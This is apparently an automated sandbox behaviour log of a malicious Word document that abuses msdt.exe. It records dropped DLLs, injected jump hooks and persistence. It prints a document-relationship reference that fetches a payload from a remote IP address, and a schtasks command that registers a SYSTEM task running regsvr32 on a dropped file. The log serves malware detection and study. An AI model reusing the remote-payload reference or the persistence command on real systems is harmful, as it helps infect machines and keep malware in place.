                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AB02E push ebx; ret 27_2_049AB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049901B0 pushad ; iretd 27_2_049901B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AAD7C push cs; iretd 27_2_049AAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049AAE7E push cs; iretd 27_2_049AAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049ACB5D push esi; iretd 27_2_049ACB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BB02E push ebx; ret 28_2_042BB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BAD7C push cs; iretd 28_2_042BAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042A01B0 pushad ; iretd 28_2_042A01B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BAE7E push cs; iretd 28_2_042BAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042BCB5D push esi; iretd 28_2_042BCB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00830790 push edx; ret 28_2_00831250
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082A002 push cs; iretd 28_2_00829FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082A1B2 push ebx; ret 28_2_0082A1B3
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00810334 pushad ; iretd 28_2_00810335
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082BCE1 push esi; iretd 28_2_0082BCE6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082E508 pushad ; retf 28_2_0082E511
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_0082E638 push edx; ret 28_2_0082E63F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00829F00 push cs; iretd 28_2_00829FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0B02E push ebx; ret 29_2_04B0B02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AF01B0 pushad ; iretd 29_2_04AF01B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0AD7C push cs; iretd 29_2_04B0AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0AE7E push cs; iretd 29_2_04B0AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0CB5D push esi; iretd 29_2_04B0CB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AC0790 push edx; ret 29_2_04AC1250
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABBCE1 push esi; iretd 29_2_04ABBCE6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABE508 pushad ; retf 29_2_04ABE511
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABE638 push edx; ret 29_2_04ABE63F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB9F00 push cs; iretd 29_2_04AB9FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABA002 push cs; iretd 29_2_04AB9FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04ABA1B2 push ebx; ret 29_2_04ABA1B3
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AA0334 pushad ; iretd 29_2_04AA0335
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,27_2_0499EEBB
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline

                            Persistence and Installation Behavior

                            barindex
                            Contains an external reference to another file
                            Source: document.xml.relsExtracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.muiJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.muiJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 90F380 value: E9 40 6E 67 02 Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 90F380 value: E9 40 6E 55 02 Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 90F380 value: E9 40 6E 5B 02 Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
